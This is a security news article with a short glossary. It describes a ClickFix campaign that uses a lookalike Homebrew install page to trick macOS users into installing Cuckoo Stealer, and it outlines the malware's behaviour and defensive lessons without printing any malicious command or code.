Copy, Paste, Compromise: Mac Devs Tricked by Homebrew Doppelganger in Cuckoo Stealer Attack

It looked like just another routine install - a familiar command, a trusted tool, and a quick copy-paste into the Terminal. But for a growing number of macOS developers and power users, that simple act has become the gateway to a full-blown cyber heist. In a chilling new campaign, attackers are using a near-perfect replica of the Homebrew installer and a clever social-engineering ploy called ClickFix to quietly infect Apple computers with the formidable Cuckoo Stealer malware - no exploits, just misplaced trust.

The Anatomy of a Deception

Security researchers recently uncovered a series of typosquatted websites - domains like homabrews[.]org - that mirror the official Homebrew project, a staple package manager for macOS. Unsuspecting visitors are greeted by a polished, familiar installation page, complete with a “Copy” button and a Terminal command that looks nearly identical to the real thing. But a few subtle characters redirect the download to attacker-controlled servers.

The brilliance of ClickFix lies in its psychological manipulation, not technical wizardry. Instead of exploiting macOS vulnerabilities, attackers rely on the trust and muscle memory of developers who routinely execute curl/bash commands. The malicious script, once pasted and run, springs a carefully disguised password prompt, looping until the user enters their real credentials - just as they would for a legitimate sudo request.

Cuckoo Stealer: More Than Just a Password Thief

Armed with the user’s password, the script stealthily downloads and launches Cuckoo Stealer. This isn’t your average infostealer: it immediately disables macOS security warnings, establishes persistence with a LaunchAgent, and opens an encrypted line to its command-and-control server using advanced cryptography. The malware then begins a data harvesting spree - browser logins, Keychain secrets, Apple Notes, messaging sessions, VPN configs, desktop files, and over 20 types of cryptocurrency wallets are all fair game. It can even take screenshots, execute shell commands, and self-destruct to cover its tracks.

Researchers have identified a coordinated infrastructure, with dozens of malicious domains and shared hosting, pointing to an organized cybercrime operation. Notably, Cuckoo Stealer skips Macs set to certain CIS (Commonwealth of Independent States) languages, a hallmark of Eastern European threat groups.

Lessons Beyond Code

This campaign is a stark reminder: in today’s threat landscape, the human factor is often the weakest link. No macOS zero-days were needed - just a convincing web page and a command that looked right. With the rise of social-engineering tactics like ClickFix, organizations and individuals alike must treat every copy-paste command with suspicion and verify sources before granting Terminal access. In the end, it’s not just code that needs patching - but our habits, too.

WIKICROOK

• Social Engineering: Social engineering is the use of deception by hackers to trick people into revealing confidential information or providing unauthorized system access.
• Typosquatting: Typosquatting is when attackers use lookalike names of trusted sites or software to trick users into visiting fake sites or downloading malware.
• Persistence: Persistence involves techniques used by malware to survive reboots and stay hidden on systems, often by mimicking legitimate processes or updates.
• Command: A command is an instruction sent to a device or software, often by a C2 server, directing it to perform specific actions, sometimes for malicious purposes.
• LaunchAgent: A LaunchAgent is a macOS file that lets programs run automatically at user login, often used by both legitimate apps and malware for persistence.